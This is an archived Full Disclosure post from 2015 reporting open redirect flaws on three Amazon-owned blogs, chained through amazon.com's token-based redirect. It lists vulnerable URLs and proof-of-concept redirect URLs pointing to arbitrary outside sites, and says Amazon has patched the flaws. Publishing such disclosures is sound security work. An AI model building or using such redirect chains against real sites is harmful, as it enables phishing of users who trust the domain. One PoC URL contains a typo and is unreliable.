| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 11 Jan 2015 14:42:57 +0800 From: Jing Wang <justqdjing@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Amazon Covert Redirect Based on Kindle Daily Post, Omnivoracious, Car Lust & kindlepost.com omnivoracious.com carlustblog.com Open Redirect *Amazon Covert Redirect Based on Kindle Daily Post, Omnivoracious, Car Lust & kindlepost.com <http://kindlepost.com> omnivoracious.com <http://omnivoracious.com> carlustblog.com <http://carlustblog.com> Open Redirect * *Discover:* Wang Jing, School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ *Domains:* http://www.amazon.com All kindlepost.com omnivoracious.com carlustblog.com are websites belonging to Amazon. http://www.kindlepost.com "The Kindle Post keeps Kindle customers up-to-date on the latest Kindle news and information and passes along fun reading recommendations, author interviews, and more." http://www.omnivoracious.com "Omnivoracious is a blog run by the books editors at Amazon.com. We aim to share our passion for the written word through news, reviews, interviews, and more. This is our space to talk books and publishing frankly and we welcome participation through comments. Please visit often or add us to your favorite RSS reader to keep up on the latest information." http://www.carlustblog.com "Car Lust is, very simply, where interesting cars meet irrational emotion. It's a deeply personal exploration of the hidden gems of the automotive world; a twisted look into a car nut's mind; and a quirky look at the broader automotive universe - a broader universe that lies beneath the new, the flashy, and the trendy represented in the car magazines." *Vulnerabilities Description:* Amazon has a security problem. Both Amazon itself and its websites are vulnerable to different kind of attacks. When a user is redirected from amazon to another site, amazon will check a variable named "token". Every redirected website will be given one token. This idea is OK. However, all URLs related to the redirected website use the same token. This means if the authenticated site itself has Open Redirect vulnerabilities. Then victims can be redirected to any site from Amazon. The vulnerabilities can be attacked without user login. Tests were performed on Safari 6.1.6 in Mac OS X 10.7.5, IE 8 in Windows 7, Chromium (version 37.0.2062.120) in Ubuntu 12.04 (281580) (64-bit). Use a website for the following tests. The website is " http://www.diebiyi.com/articles". Suppose this website is malicious, *(1) Kindle Daily Post Open Redirect & Amazon Covert Redirect Based on kindlepost.com <http://kindlepost.com>* *(1.1) Kindle Daily Post Open Redirect Security Vulnerability* *Vulnerable Links:* http://www.kindlepost.com/.services/sitelogout?to=https%3A%2F%2Fwww.typekey.com%2Ft%2Ftypekey%2F%3F__mode%3Dlogout%26_return%3Dhttp%253A%252F%252Fwww.kindlepost.com%252F2013%252F03%252Fqa-with-rainbow-rowell-author-of-eleanor-park.html *Poc:* http://www.kindlepost.com/.services/sitelogout?to=http%3A%2F%2Fwww.diebiyi.com%3F%26_return%3Dhttp%253A%252F%252Fwww.kindlepost.com *(1.2) Amazon Covert Redirect Based on kindlepost.com <http://kindlepost.com>* *Vulnerable URL of Amazon:* http://www.amazon.com/gp/redirect.html?location=http://www.kindlepost.com/2014/02/index.html&token=97EABBFF98EABCEDF090385394AD488FF77F2E0D *POC:* http://www.amazon.com/gp/redirect.html?location=http%3A%2F%2Fwww.kindlepost.com%2F.services%2Fsitelogout%3Fto%3Dhttp%253A%252F%252Fwww.diebiyi.com%253F%2526_return%253Dhttp%25253A%25252F%25252Fwww.kindlepost.com&token=97EABBFF98EABCEDF090385394AD488FF77F2E0D *(2) Omnivoracious Open Redirect & Amazon Covert Redirect Based on omnivoracious.com <http://omnivoracious.com>* *(2.1) Omnivoracious Open Redirect Security Vulnerability* *Vulnerable Links:* http://www.omnivoracious.com/.services/sitelogout?to=https%3A%2F%2Fwww.bing.com%2Ft%2Ftypekey%2F%3F__mode%3Dlogout%26_return%3Dhttp%253A%252F%252Fwww.omnivoracious.com%252F2008%252F05%252Flicensed-to-thr.html *POC:* http://www.omnivoracious.com/.services/sitelogout?to=http%3A%2F%2Fwww.tetraph.com%3F%26_return%3Dhttp%253A%252F%252Fwww.omnivoracious.com *(2.2) Amazon Covert Redirect Based on omnivoracious.com <http://omnivoracious.com>* *Vulnerable URL:* http://www.amazon.com/gp/redirect.html?location=http://www.omnivoracious.com/2014/01/women-in-wartime-four-new-historical-novels.html&token=7B08D69EFB23F01C31332A4EB1A38F4804AAB087 *POC:* http://www.amazon.com/gp/redirect.html?location=http%3A%2F%2Fwww.omnivoracious.com%2F.services%2Fsitelogout%3Fto%3Dhttp%253A%252F%252Fwww.xinhuanet.com%253F%2526_return%253Dhttp%25253A%25252F%25252Fwww.omnivoracious.com&token=7B08D69EFB23F01C31332A4EB1A38F4804AAB087 *(3) Car Lust Open Redirect & Amazon Covert Redirect Based on carlustblog.com <http://carlustblog.com>* *(3.1) Car Lust Open Redirect Security Vulnerability* *Vulnerable Links:* http://www.carlustblog.com/.services/sitelogout?to=http%3A%2F%2Fwww.xvideos.com%3F%26_return%3Dhttp%253A%252F%252Fwww.carlustblog.com *POC:* http://www.carlustblog.com/.services/sitelogout?to=http%3A%2F%2Fwww.kickass.so%3F%26_return%3Dhttp%253A%252F%252Fwww.carlustblog.com *(3.2) Amazon Covert Redirect Based on carlustblog.com <http://carlustblog.com>* *Vulnerable URL:* http://www.amazon.com/gp/redirect.html?location=http://www.carlustblog.com/2014/01/gmc-canyon-isuzu-i-series-and-chevrolet-colorado-gmt355-platform.html&token=E0915379AEBDF40D2C90D4882003C7011F43D80 *POC:* http://www.amazon.com/gp/redirect.html?location=http%3A%2F%2Fwww.varlustblog.com%2F.services%2Fsitelogout%3Fto%3Dhttp%253A%252F%252Fwww.inzeed.com%253F%2526_return%253Dhttp%25253A%25252F%25252Fwww.omnivoracious.com&token=E0915379AEBDF40D2C90D4882003C7011F43D80 The vulnerabilities were reported to Amazon in 2014. Amazon has patch the vulnerabilities. *POC Video:* https://www.youtube.com/watch?v=UE_-AdA-zpQ&feature=youtu.be *Blog Details:* http://securityrelated.blogspot.com/2015/01/amazon-covert-redirect-based-on-kindle.html -- Wang Jing School of Physical and Mathematical Sciences (SPMS) Nanyang Technological University (NTU), Singapore _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists